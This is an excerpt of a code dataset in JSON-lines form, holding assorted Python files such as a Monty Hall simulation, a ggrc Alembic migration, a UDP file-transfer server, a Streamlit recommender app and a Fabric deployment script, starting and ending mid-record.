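    autor = doc.xpath("/biblioteca/libro[codigo/text()='%s']/autor/text()" % codigo)[0]
    print(titulo, autor)                    # -> Quijote Cervantes
```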
(positive number) \"))\n\n\n# Dont swap doors\nno_swap_win, no_swap_tot = 0, 0\n\nfor i in range(1,trial_iterations):\n\tno_swap_target, no_swap_guess = random.randint(1,3), random.randint(1,3)\n\tif no_swap_target == no_swap_guess:\n\t\tno_swap_win += 1\n\tno_swap_tot += 1\n\nno_swap_prob = no_swap_win/no_swap_tot\n\n\n# Swap doors\nswap_win, swap_tot = 0, 0\n\nfor i in range(1,trial_iterations):\n\tswap_target, first_guess = random.randint(1,3), random.randint(1,3)\n\tif first_guess != swap_target:\n\t\tswap_win += 1\n\tswap_tot += 1\n\nswap_prob = swap_win/swap_tot\n\n\n# Print results\nprint(\"Trials simulated: \t {}\".format(trial_iterations))\nprint(\"Probability of swapping: {}%\".format(swap_prob*100))\nprint(\"Probability of not swapping: {}%\".format(no_swap_prob*100))\n","sub_path":"Main_Arch/in_class_CS199_1/montyHall.py","file_name":"montyHall.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"79333683","text":"class acmp4(object):\n def game():\n while True:\n usernum = int(input(\"enter number \\n\"))\n if usernum < 10 and usernum > 0:\n break\n print(\"Wrong Number\")\n\n result = 9 - usernum\n print((usernum * 100) + 90 + result)","sub_path":"PythonLearning/acmp4.py","file_name":"acmp4.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"346428009","text":"# Copyright (C) 2016 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"\nMigrate audits for snapshots\n\nCreate Date: 2016-11-17 11:49:04.547216\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\nfrom logging import getLogger\n\nfrom alembic import op\n\nfrom sqlalchemy.sql import column\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql import table\nfrom sqlalchemy.sql import tuple_\n\nfrom ggrc.models.event import Event\nfrom ggrc.models.revision import Revision\nfrom ggrc.models.snapshot import Snapshot\nfrom ggrc.models.assessment import Assessment\nfrom ggrc.models.issue import Issue\n\nfrom ggrc.migrations.utils import get_relationship_cache\nfrom ggrc.migrations.utils import get_revisions\nfrom ggrc.migrations.utils import insert_payloads\nfrom ggrc.migrations.utils import Stub\nfrom ggrc.migrations.utils.validation import (\n validate_assessment_issue_to_audit_relationships)\n\nfrom ggrc.migrations.utils.migrator import get_migration_user_id\n\nfrom ggrc.snapshotter.rules import Types\n\n\nlogger = getLogger(__name__) # pylint: disable=invalid-name\n\n\n# revision identifiers, used by Alembic.\nrevision = '142272c4a0b6'\ndown_revision = '579239d161e1'\n\nevents_table = Event.__table__\nsnapshots_table = Snapshot.__table__\nrevisions_table = Revision.__table__\n\nassessments_table = Assessment.__table__\nissues_table = Issue.__table__\n\naudits_table = table(\n \"audits\",\n column(\"id\"),\n column(\"context_id\"),\n column(\"program_id\"),\n)\n\nprograms_table = table(\n \"programs\",\n column(\"id\"),\n column(\"context_id\")\n)\n\n\ndef create_snapshots(connection, user_id, caches, audits):\n \"\"\"Create snapshots and relationships to programs\"\"\"\n # pylint: disable=too-many-locals\n relationships_payload = []\n snapshots_payload = []\n snapshot_quads = set()\n\n program_relationships = caches[\"program_rels\"]\n audit_relationships = caches[\"audit_rels\"]\n program_contexts = 
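Editor's note on montyHall.py above: both loops use `range(1, trial_iterations)`, so each arm runs one fewer trial than requested, and the host's door is never modeled explicitly (the swap arm just relies on the complement event). A corrected, self-contained sketch; the function name is mine:

```python
import random

def monty_hall(trials, swap):
    wins = 0
    for _ in range(trials):                 # range(trials), not range(1, trials)
        car = random.randint(1, 3)
        guess = random.randint(1, 3)
        # host opens a goat door that is neither the car nor the guess
        opened = next(d for d in (1, 2, 3) if d not in (car, guess))
        if swap:
            guess = next(d for d in (1, 2, 3) if d not in (guess, opened))
        wins += (guess == car)
    return wins / trials

print("swap ~", monty_hall(100_000, swap=True))    # ~0.667
print("stay ~", monty_hall(100_000, swap=False))   # ~0.333
```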
caches[\"program_contexts\"]\n revisions_cache = caches[\"revisions\"]\n\n for audit in audits:\n parent_key = Stub(\"Audit\", audit.id)\n program_key = Stub(\"Program\", audit.program_id)\n audit_scope_objects = audit_relationships[parent_key]\n program_scope_objects = program_relationships[program_key]\n missing_in_program_scope = audit_scope_objects - program_scope_objects\n\n if missing_in_program_scope:\n for obj_ in missing_in_program_scope:\n if obj_ in revisions_cache:\n relationships_payload += [{\n \"source_type\": \"Program\",\n \"source_id\": audit.program_id,\n \"destination_type\": obj_.type,\n \"destination_id\": obj_.id,\n \"modified_by_id\": user_id,\n \"context_id\": program_contexts[audit.program_id],\n }]\n\n if audit_scope_objects:\n for obj_ in audit_scope_objects:\n if obj_ in revisions_cache:\n quad = (\"Audit\", audit.id, obj_.type, obj_.id)\n snapshot_quads.add(quad)\n snapshots_payload += [{\n \"parent_type\": \"Audit\",\n \"parent_id\": audit.id,\n \"child_type\": obj_.type,\n \"child_id\": obj_.id,\n \"revision_id\": revisions_cache[obj_],\n \"context_id\": audit.context_id,\n \"modified_by_id\": user_id,\n }]\n # this is because of our hack where we rely on relationships\n # to actually show objects\n relationships_payload += [{\n \"source_type\": \"Audit\",\n \"source_id\": audit.id,\n \"destination_type\": obj_.type,\n \"destination_id\": obj_.id,\n \"modified_by_id\": user_id,\n \"context_id\": audit.context_id,\n }]\n else:\n logger.warning(\n \"Missing revision for object %s-%s\", obj_.type, obj_.id)\n\n insert_payloads(connection, snapshots_payload, relationships_payload)\n return snapshot_quads\n\n\ndef process_audits(connection, user_id, caches, audits):\n \"\"\"Process audits\"\"\"\n snapshot_quads = create_snapshots(connection, user_id, caches, audits)\n\n relationships_payload = []\n if snapshot_quads:\n snapshots = connection.execute(select([snapshots_table]).where(\n tuple_(\n Snapshot.parent_type,\n Snapshot.parent_id,\n Snapshot.child_type,\n Snapshot.child_id,\n ).in_(snapshot_quads)\n )).fetchall()\n snapshot_cache = {\n (obj_.parent_type, obj_.parent_id,\n obj_.child_type, obj_.child_id): (obj_.id, obj_.context_id)\n for obj_ in snapshots\n }\n for snapshot in snapshot_quads:\n relationships_payload += [{\n \"source_type\": snapshot[2],\n \"source_id\": snapshot[3],\n \"destination_type\": \"Snapshot\",\n \"destination_id\": snapshot_cache[snapshot][0],\n \"modified_by_id\": user_id,\n \"context_id\": snapshot_cache[snapshot][1],\n }]\n\n insert_payloads(connection, relationships=relationships_payload)\n\n\ndef upgrade():\n \"\"\"Migrate audit-related data and concepts to audit snapshots\"\"\"\n # pylint: disable=too-many-locals\n\n connection = op.get_bind()\n\n audits_more, ghost_objects = (\n validate_assessment_issue_to_audit_relationships(connection))\n\n if audits_more or ghost_objects:\n if audits_more:\n for klass_name, ids in audits_more.items():\n logger.warning(\n \"The following %s have more than one Audit: %s\",\n klass_name,\n \",\".join(map(str, ids)) # pylint: disable=bad-builtin\n )\n if ghost_objects:\n for klass_name, ids in ghost_objects.items():\n logger.warning(\n \"The following %s have no Audits mapped to them: %s\",\n klass_name,\n \",\".join(map(str, ids)) # pylint: disable=bad-builtin\n )\n raise Exception(\"Cannot perform migration. 
Check logger warnings.\")\n\n audits = connection.execute(audits_table.select()).fetchall()\n if audits:\n program_ids = {audit.program_id for audit in audits}\n\n program_sql = select([programs_table]).where(\n programs_table.c.id.in_(program_ids)\n )\n programs = connection.execute(program_sql)\n program_contexts = {program.id: program.context_id for program in programs}\n\n program_relationships = get_relationship_cache(\n connection, \"Program\", Types.all)\n audit_relationships = get_relationship_cache(\n connection, \"Audit\", Types.all)\n\n all_objects = (program_relationships.values() +\n audit_relationships.values())\n revisionable_objects = set()\n revisionable_objects = revisionable_objects.union(*all_objects)\n revision_cache = get_revisions(connection, revisionable_objects)\n\n objects_missing_revision = (revisionable_objects -\n set(revision_cache.keys()))\n if objects_missing_revision:\n missing = \",\".join(\n [\"{obj.type}-{obj.id}\".format(obj=obj)\n for obj in objects_missing_revision])\n logger.warning(\n \"Phantom objects mapped to program or audit: %s\", missing)\n\n caches = {\n \"program_contexts\": program_contexts,\n \"program_rels\": program_relationships,\n \"audit_rels\": audit_relationships,\n \"revisions\": revision_cache\n }\n\n user_id = get_migration_user_id(connection)\n\n process_audits(connection, user_id, caches, audits)\n\n\ndef downgrade():\n pass\n","sub_path":"src/ggrc/migrations/versions/20161117114904_142272c4a0b6_migrate_audits_for_snapshots.py","file_name":"20161117114904_142272c4a0b6_migrate_audits_for_snapshots.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"595407911","text":"import arcade\n\nWINDOW_WIDTH = 500\nWINDOW_HEIGHT = 500\nBACKGROUND_COLOR = arcade.color.ANTIQUE_WHITE\nGAME_TITLE = \"Ada or Potato?\"\n\nTIMER_MAXIMUM = 6\n\nIMAGE_ADA = arcade.load_texture(\"images/ada.png\")\nIMAGE_POTATO = arcade.load_texture(\"images/potato.png\", scale=.21)\n\n\nclass Ada(arcade.Sprite):\n timer: int\n\n def __init__(self):\n super().__init__()\n self.timer = 0\n self.center_x = WINDOW_WIDTH/2\n self.center_y = WINDOW_HEIGHT/2\n self.texture = IMAGE_ADA\n\n def update_timer(self):\n if self.timer < TIMER_MAXIMUM:\n self.timer += 1\n else:\n self.timer = 0\n self.switch_image()\n\n def update(self):\n self.update_timer()\n\n def switch_image(self):\n if self.texture == IMAGE_ADA:\n self.texture = IMAGE_POTATO\n else:\n self.texture = IMAGE_ADA\n\n\nclass AdaGame(arcade.Window):\n\n def __init__(self):\n super().__init__(WINDOW_WIDTH, WINDOW_HEIGHT, GAME_TITLE)\n self.points = 0\n self.status = Ada()\n\n def setup(self):\n arcade.set_background_color(BACKGROUND_COLOR)\n\n def on_draw(self):\n \"\"\" Called when it is time to draw the world \"\"\"\n arcade.start_render()\n self.status.draw()\n output = f\"Score: {self.points}\"\n arcade.draw_rectangle_outline(35, 55, 60.0, 45.0, arcade.color.BLACK)\n arcade.draw_text(output, 10, 50, arcade.color.BLACK, 13)\n\n def on_update(self, delta_time):\n self.status.update()\n\n def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):\n if self.status.texture == IMAGE_ADA:\n self.points += 1\n else:\n self.points -= 1\n\ndef main():\n window = AdaGame()\n window.setup()\n arcade.run()\n\n\nif __name__ == \"__main__\":\n 
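Editor's note on the snapshot migration above: `create_snapshots` hinges on set algebra over (type, id) stubs, e.g. `audit_scope_objects - program_scope_objects` decides which Program relationships must be backfilled. A standalone illustration, with a namedtuple standing in for `ggrc.migrations.utils.Stub` and made-up sample stubs:

```python
from collections import namedtuple

Stub = namedtuple("Stub", ["type", "id"])   # stand-in for ggrc.migrations.utils.Stub

program_scope = {Stub("Control", 1), Stub("Policy", 7)}
audit_scope = {Stub("Control", 1), Stub("Control", 2)}

# objects mapped to the audit but not yet to its program each get a
# Program<->object relationship payload, mirroring create_snapshots
missing_in_program_scope = audit_scope - program_scope
print(missing_in_program_scope)             # {Stub(type='Control', id=2)}
```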
main()","sub_path":"game1_ada_or_potato.py","file_name":"game1_ada_or_potato.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"116285330","text":"from gensim.models import KeyedVectors\nimport sys\n\ndef addsub(word1, word2, word3):\n wv = KeyedVectors.load_word2vec_format('./wiki.vec.pt', binary=True)\n new_vec = wv[word1] - wv[word2] + wv[word3]\n results = wv.most_similar(positive=[new_vec])\n for result in results:\n print(result)\n\nif __name__ == \"__main__\":\n args = sys.argv\n word1 = str(args[1])\n word2 = str(args[2])\n word3 = str(args[3])\n\n addsub(word1, word2, word3)\n","sub_path":"word2vec/addsub3.py","file_name":"addsub3.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"466025855","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# #\n# Author Alan David Martínez. Copyright Alan David Martínez - #\n# alan.david507@gmail.com #\n# This program is free software: you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation, either version 3 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License #\n# along with this program. If not, see . #\n# #\n##############################################################################\n\nfrom openerp import models, fields, api\n\n\nclass account_invoice(models.Model):\n _inherit = 'account.invoice'\n\n @api.multi\n def set_number(self):\n return {\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'account.invoice.next_number',\n 'target': 'new',\n 'type': 'ir.actions.act_window',\n 'context': {'invoice_id': self.id}\n }\n\n\nclass next_number(models.TransientModel):\n _name = 'account.invoice.next_number'\n\n @api.model\n def get_number(self):\n invoice_id = self.env.context.get('invoice_id')\n invoice_obj = self.pool['account.invoice']\n sequence_obj = self.pool['ir.sequence']\n invoice = invoice_obj.browse(self.env.cr, self.env.uid, invoice_id)\n taller_seq = sequence_obj.browse(self.env.cr, self.env.uid, 15)\n return taller_seq.number_next\n\n @api.multi\n def do_action(self):\n sequence_obj = self.pool['ir.sequence']\n invoice_id = self.env.context.get('invoice_id')\n invoice_obj = self.pool['account.invoice']\n invoice = invoice_obj.browse(self.env.cr, self.env.uid, invoice_id)\n taller_seq = sequence_obj.browse(self.env.cr, self.env.uid, 15)\n taller_seq.sudo().write({'number_next': self.next_number})\n\n # COLUMNAS\n next_number = fields.Integer('Next Number')\n actual_number = fields.Integer('Actual Number', default=get_number)\n","sub_path":"chiex/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"557572910","text":"# From facebook codelab \n# Given N and M find all stepping numbers in range N to M\n# A number is called as a stepping number if the adjacent digits have a difference of 1.\n# e.g 123 is 
stepping number, but 358 is not a stepping number\n\n#helper function which checks whether specified number's adjacent digits differ by one \n\ndef isStepNum(a):\n\n\tprev = a%10\n\ta = a/10\n\twhile(a > 0):\n\t\tcurrent = a%10\n\t\tif abs(current - prev) != 1:\n\t\t\treturn False\n\t\tprev = current\n\t\ta = a/10\n\treturn True\n\ndef stepnum(A, B):\n\t#data structure to return - contains all valid numbers in range [A,B]\n\tans = []\n\t\n\t#iterate from A - B - not using a for loop to facilitate an optimization, see below\n\ti = A \n\twhile(i <= B):\n\n\t\t#optimization - if all but the most significant digit do not form a valid step number, all 10 numbers iwth those least significant\n\t\t#digits can be skipped == eg 130 - 139 cannot be valid \n\t\tif(i >= 110):\n\t\t\tif not isStepNum(i/10):\n\t\t\t\ti = i + (10 - i%10) #this formula will go to the next group of tens - eg from 203 to 210\n\t\t\n\t\tif isStepNum(i):\n\t\t\tans.append(i)\n\n\t\ti = i + 1\n\treturn ans\n\n\n\n#test - should return 10, 12\nprint(stepnum(10, 20))","sub_path":"python/stepnum.py","file_name":"stepnum.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"384419318","text":"__doc__ = '''Sample size boosting.'''\nfrom PIL import Image, ImageFilter\nimport os\nimport numpy as np\n\n\nsubsampled_size = (128,128)\n\ndef make_subimages(im):\n\tdim = min(im.size) * .9\n\tupper_left = im.crop((0,0,dim,dim))\n\tlower_left = im.crop((0, im.height - dim, dim, im.height))\n\tupper_right = im.crop((im.width - dim, 0, im.width, dim))\n\tlower_right = im.crop((im.width - dim, im.height-dim, im.width, im.height))\n\tmidtop = (im.height - dim) // 2\n\tmidleft = (im.width - dim) // 2\n\tmid = im.crop((midleft, midtop, midleft + dim, midtop + dim))\n\treturn [upper_left, upper_right, lower_left, lower_right, mid]\n\ndef sample_size_boost(values, new_size = subsampled_size):\n# every possible rotation and flip: rotate 90, fliph, flipv\t\n\timage = Image.fromarray(values.astype('uint8'))\n\tlist_0 = make_subimages(image)\n\tlist_1 = []\n\tlist_2 = []\n\tlist_3 = []\n\tlist_4 = []\n\tfor i in list_0: \n\t\tlist_1.append(i.rotate(90))\n\t\tlist_1.append(i)\n\tdel list_0\n\tfor i in list_1: \n\t\tlist_2.append(i.transpose(Image.FLIP_LEFT_RIGHT))\n\t\tlist_2.append(i)\n\tdel list_1\n\tfor i in list_2: \n\t\tlist_3.append(i.transpose(Image.FLIP_TOP_BOTTOM))\t\n\t\tlist_3.append(i)\n\tdel list_2\n\t# downsample images\n\tfor i in list_3: list_4.append(np.array(i.resize(subsampled_size)))\n\treturn list_4\n\t\nif __name__ == \"__main__\":\n\tx = np.arange(1638400).reshape(1280,-1)\n\tprint(len(sample_size_boost(x)))\n","sub_path":"SSB.py","file_name":"SSB.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"591582851","text":"import random\nimport string\nfrom django.contrib.sites.models import Site\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.utils import timezone\nfrom bearded_comments.models import TComment, TCommentNode\nfrom bearded_comments.forms import TCommentForm\n\n_GTLDS = ['.com', '.net', '.org']\n\ndef random_string(len_=5):\n return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(len_))\n\ndef random_email():\n return ''.join([random_string(), '@', random_string(), random.choice(_GTLDS)])\n\ndef random_url():\n return ''.join([random_string(), random.choice(_GTLDS)])\n\ndef 
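Editor's note on stepnum.py above: `a = a/10` is float division in Python 3, so `isStepNum` quietly stops working on anything but tiny inputs; integer digit-peeling needs `divmod` or `//`. A fixed sketch with a quick check:

```python
def is_step_num(n):
    # peel digits with integer arithmetic (the snippet's a = a/10 yields floats)
    n, prev = divmod(n, 10)
    while n > 0:
        n, cur = divmod(n, 10)
        if abs(cur - prev) != 1:
            return False
        prev = cur
    return True

print([n for n in range(10, 130) if is_step_num(n)])
# [10, 12, 21, 23, 32, 34, 43, 45, 54, 56, 65, 67, 76, 78, 87, 89, 98, 101, 121, 123]
```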
create_tcomment(target=None, **kwargs):\n \"\"\"\n Factory for creating TComment instances.\n :param target: Target model of the comment. Defaults to the current Site.\n :return: A new TComment instance.\n \"\"\"\n site = Site.objects.get_current()\n target_ = target if target else site\n # content_type, object_pk, timestamp, security_hash\n security_data = TCommentForm(target_).generate_security_data()\n # Base django_comments data\n data = {\n 'content_type': ContentType.objects.get_for_model(target_),\n 'object_pk': security_data['object_pk'],\n 'user_name': random_string(),\n 'user_email': random_email(),\n 'user_url': random_url(),\n 'comment': random_string(25),\n 'submit_date': timezone.now(),\n 'site_id': site.pk,\n 'is_public': True,\n 'is_removed': False\n }\n # Extended TComment data\n data.update({\n 'title': random_string()\n })\n # Caller override auto-generated fields\n data.update(kwargs)\n return TComment(**data)\n\ndef create_tcomment_node(comment=None, parent=None):\n \"\"\"\n Factory for creating TCommentNode instances.\n \"\"\"\n pass\n\ndef create_tcomment_tree(target=None, \n max_depth=3, \n max_children=3, \n with_signal=False,\n depth=1, \n parent=None):\n \"\"\"\n Recursively populate the database with a random tree of depth max_depth.\n \"\"\"\n if depth <= max_depth:\n children = random.randrange(1, max_children + 1)\n for _ in range(children):\n c = create_tcomment(target)\n c.save()\n if parent:\n node = parent.node.add_child(comment=c)\n else:\n node = TCommentNode.add_root(comment=c)\n c.node = node\n c.save()\n create_tcomment_tree(target, depth=depth+1, parent=c, with_signal=with_signal)\n\n\n\n\n\n","sub_path":"bearded_comments/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"321122744","text":"a = dict(one=1,two=2,three=3)\nb = {'one':1,'two':2,'three':3}\nc = dict(zip(['one','two','three'],[1,2,3]))\nd = dict([('two',2),('one',1),('three',3)])\ne = dict({'three':3,'one':1,'two':2})\nprint(a==b==c==d==e)\n\nDIAL_CODES = [\n (86,'china'),\n (91,'india'),\n (1,'united states'),\n (62,'indonesia'),\n (55,'brazil'),\n (92,'pakistan'),\n (880,'bangladesh'),\n (234,'nigeria'),\n (7,'russia'),\n (81,'janpan'),\n]\ncountry_code = {country.title(): code for code,country\n in DIAL_CODES\n if code <66}\nprint(country_code)\n\nimport sys,re\n\n\nWORD_RE = re.compile(r'\\w+')\nindex = {}\nwith open(sys.argv[1],encoding='utf-8') as fp:\n print(fp)\n for line_no,line in enumerate(fp,1):\n for match in WORD_RE.finditer(line):\n word = match.group()\n column_no = match.start()+1\n location = (line_no,column_no)\n\n occurrences = index.get(word,[])\n occurrences.append(location)\n index[word] = occurrences\n\n index.setdefault(word,[]).append(location)\n my_dict.setdefault(key,[]).append(new_value)\n\n if key not in my_dict:\n my_dict[key] = []\n my_dict[key].append(new_valueaa)\n\n for word in sorted (index,key=str.upper()):\n print(word,index[word])\n","sub_path":"*Fluent_python/Data_struct/dict_.py","file_name":"dict_.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"48460691","text":"# pylint: skip-file\nimport sys\nimport socket\nimport struct\nimport random\nimport os\nimport pathlib\n\ndef computeCheckSum(data):\n checksum = 0\n # checking if this is even\n if len(data)%2 != 0:\n data += '0'\n for i in range(0, len(data), 2):\n 
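Editor's note on dict_.py above: the word-index fragment mixes several idioms, references undefined names (`my_dict`, `new_valueaa`), and ends with `sorted(index, key=str.upper())`, which *calls* `str.upper` instead of passing it. A self-contained working version of the index it is building (sample text is illustrative):

```python
import re

WORD_RE = re.compile(r"\w+")
index = {}

text = ["one two one", "two three"]
for line_no, line in enumerate(text, 1):
    for match in WORD_RE.finditer(line):
        # setdefault creates the occurrence list on first sight of a word
        index.setdefault(match.group(), []).append((line_no, match.start() + 1))

for word in sorted(index, key=str.upper):   # pass the function, don't call it
    print(word, index[word])
```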
element = ord(data[i]) + (ord(data[i+1]) << 8)\n sum = element + checksum\n carry = sum >> 16\n sum = sum & 0xFFFF\n # adding the carry to the LSB\n checksum = sum + carry\n # 1's compliment\n checksum = (~checksum) & 0xFFFF\n return checksum\n\ndef receivingHandler(server_socket):\n file = open(FILE_NAME, \"w\")\n expected_seq = 0\n is_file_received = False\n while not is_file_received:\n packet, client_address = server_socket.recvfrom(BUFFER_SIZE)\n header = struct.unpack('!IHH', packet[0:8])\n sequence_number = header[0]\n # print(\"recv: \", sequence_number)\n data = packet[8:].decode()\n loss_value = random.random()\n # sanity check\n if header[2] == 0b0101010101010101 and computeCheckSum(data) == header[1] and sequence_number <= expected_seq:\n if loss_value > LOSS_PROB:\n server_socket.sendto(struct.pack('!IHH', sequence_number, 0, 0xAAAA), client_address)\n if len(data) > 0 and sequence_number == expected_seq:\n file.write(data)\n expected_seq = expected_seq + 1\n else:\n file.close()\n server_socket.close()\n is_file_received = True\n continue\n else:\n print(\"Packet loss, sequence number = \", sequence_number)\n\n\"\"\"\nCommand:\nSimple_ftp_server port# file-name p\npython3 testserver.py Simple_ftp_server 7735 output.txt 0.07\n\"\"\"\n\n# taking inputs\nif len(sys.argv) != 5 or sys.argv[1] != \"Simple_ftp_server\":\n print(\"Please enter correct command\")\n sys.exit()\n\nSERVER_PORT = int(sys.argv[2])\nFILE_NAME = str(sys.argv[3])\nLOSS_PROB = float(sys.argv[4])\n\n# 8 bytes as header size\nBUFFER_SIZE = 8192\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserver_socket.bind((socket.gethostname(), SERVER_PORT))\n\n# deleting already existing file\nold_file = pathlib.Path(FILE_NAME)\nif old_file.is_file():\n os.remove(FILE_NAME)\n\nreceivingHandler(server_socket)\n\nprint(\"File tranfered successfully.\")\n","sub_path":"SelectiveRepeatRequest/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"494666680","text":"import streamlit as st\n# from PIL import Image\n# import cv2 \nimport pandas as pd\nimport numpy as np\nimport os\nimport random\nimport streamlit.components.v1 as components\n\ndef get_rec(input_name,df,k=10):\n name_list = df[0].tolist()\n idx = name_list.index(input_name)\n output = df.iloc[idx,1:k+1].tolist()\n# df_rec = df[df[0]==input_name]\n return output\ndef show_rec(rec_list):\n pic_dir ='actor_pic/'\n alL_mov = os.listdir(pic_dir)\n rec_pic = []\n\n for i in range(len(rec_list)):\n # st.text(rec_df.columns)\n rec_name = rec_list[i]\n mov_dir = pic_dir+rec_name.replace(\" \",\"_\")\n show_num = 0\n try:\n for mov in os.listdir(mov_dir):\n if mov[-5:]=='.jpeg':\n load_image(mov_dir+'/'+mov,title = \"Top %d\"%(i+1),subheader = rec_name)\n show_num+=1\n break\n except:\n place_holder_path = \"image_place_holder/people-icon.png\"\n load_image(place_holder_path,title = \"Top %d\"%(i+1),subheader = rec_name)\n\n return \n \n \ndef load_image(image_path,title='',subheader='', width=100):\n \n st.title(title) \n st.subheader(subheader)\n print(image_path)\n st.image(image_path,width=width)\n\ndef app():\n # try:\n view_net = st.button(\"View NETFLIX social network\")\n\n if view_net:\n st.write(\"This is the network centered around Kevin Bacon. 
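Editor's note on the UDP file-transfer server above: `computeCheckSum` is a 16-bit one's-complement checksum over little-endian character pairs, folding the end-around carry at each step. An equivalent bytes-based sketch plus the receiver-side verification; helper names are mine:

```python
def fold16(x):
    # end-around carry: fold anything above 16 bits back into the sum
    while x >> 16:
        x = (x & 0xFFFF) + (x >> 16)
    return x

def checksum16(data: bytes) -> int:
    # little-endian 16-bit words, one's-complement sum, complemented at the end
    if len(data) % 2:
        data += b"\x00"                     # pad odd-length input, as the server does
    return ~fold16(sum(data[i] | (data[i + 1] << 8)
                       for i in range(0, len(data), 2))) & 0xFFFF

payload = b"hello"
cks = checksum16(payload)
padded = payload + b"\x00"
words = sum(padded[i] | (padded[i + 1] << 8) for i in range(0, len(padded), 2))
assert fold16(words + cks) == 0xFFFF        # receiver-side verification passes
print(hex(cks))
```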
\\nA statement here: all actors in this network is not further than 2 steps away from Kevin Bacon.\\n Do you believe it?\")\n\n # HtmlFile = open(\"sample.html\", 'r', encoding='utf-8')\n HtmlFile = open(\"vis/actor.html\", 'r', encoding='utf-8')\n source_code = HtmlFile.read() \n components.html(source_code, height = 500,width=1000)\n\n # load_image('/Users/luocan/class/2021spring/big_data/final-project/app/actor_net.png',\n # title='Explore the entertainment industry network',subheader='',\n # width = 800)\n\n input_cat = st.sidebar.selectbox(\n 'Who are you?',\n ('actor','director')\n )\n\n if input_cat =='actor':\n output_cat = 'actor'\n else:\n output_cat = st.sidebar.selectbox(\n 'Who are you intersted in?',\n ('actor','director')\n )\n if input_cat =='director':\n input_c = 'd'\n else:\n input_c = 'c'\n if output_cat =='director':\n output_c = 'd'\n else:\n output_c = 'c'\n path = \"../data/net_inf/common_neighbor_%s%s.txt\"%(input_c,output_c)\n df = pd.read_csv(path,header = None)\n name_list = df[0].tolist()\n input_name = st.sidebar.selectbox(\n 'Your name: ',\n sorted(name_list)\n )\n K = st.sidebar.selectbox(\n 'How many recommendation do you want? ',\n list(range(1,11))\n )\n\n rec_list = get_rec(input_name,df,k = K)\n st.title(\"Based on the common neighbors information, we think you might be intersted in these %ss\"%(output_cat))\n show_rec(rec_list)\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n app()","sub_path":"03-Application/ent_network.py","file_name":"ent_network.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"405328968","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 12 18:40:57 2020\n\n@author: ASUS\n\"\"\"\n\nfrom bs4 import BeautifulSoup\n\nfrom urllib.request import urlopen\n\n#html = urlopen('https://morvanzhou.github.io/static/scraping/basic-structure.html').read().decode('utf-8')\n\n#soup = BeautifulSoup(html,'html.parser')\n'''\nprint(type(soup))\n#print(soup.h1)\n#print(soup.p)\n\nprint(soup.h1.text)\nprint(soup.p.text)\n\n#透過find_all抓取連結\nall_href = soup.find_all('a')\n\nfindAll 是2.x版本\nfind_all 是3.x版本\n兩者在3.x 均可使用\n\n\n\nprint(all_href)\nfor i in all_href:\n print(i['href'])\n''' \nhtml = urlopen(\"http://www.pythonscraping.com/pages/warandpeace.html\")\nbsObj = BeautifulSoup(html)\nnameList = bsObj.find_all(\"span\",{\"calss':'red\"})\nfor name in nameList:\n print(name.get_text())\n ","sub_path":"0312/py01.py","file_name":"py01.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313362167","text":"#-*- coding: utf-8 -*-\n\nimport subprocess\nfrom fabric.api import *\nfrom fabric.contrib.console import confirm\n\nenv.hosts = [\"ec2-52-192-156-109.ap-northeast-1.compute.amazonaws.com\"]\nenv.user = \"gituser\"\nenv.key_filename = \"~/.ssh/id_git_rsa\"\nenv.local_src_path = \"/home/hiroaki/working\"\n\ndef hello(name=\"world\"):\n print(\"Hello %s\" % name)\n\ndef get_commit_id():\n \"\"\"\n ~/woking/ディレクトリのmaster branchのcommit idを取得する\n \"\"\"\n with lcd(env.local_src_path): # lcdされないsubprocessだと無効?\n commit_log = local(\"git log --graph --oneline\", capture=True)\n print(commit_log)\n print(\"--------------------------------------\")\n commit_id = 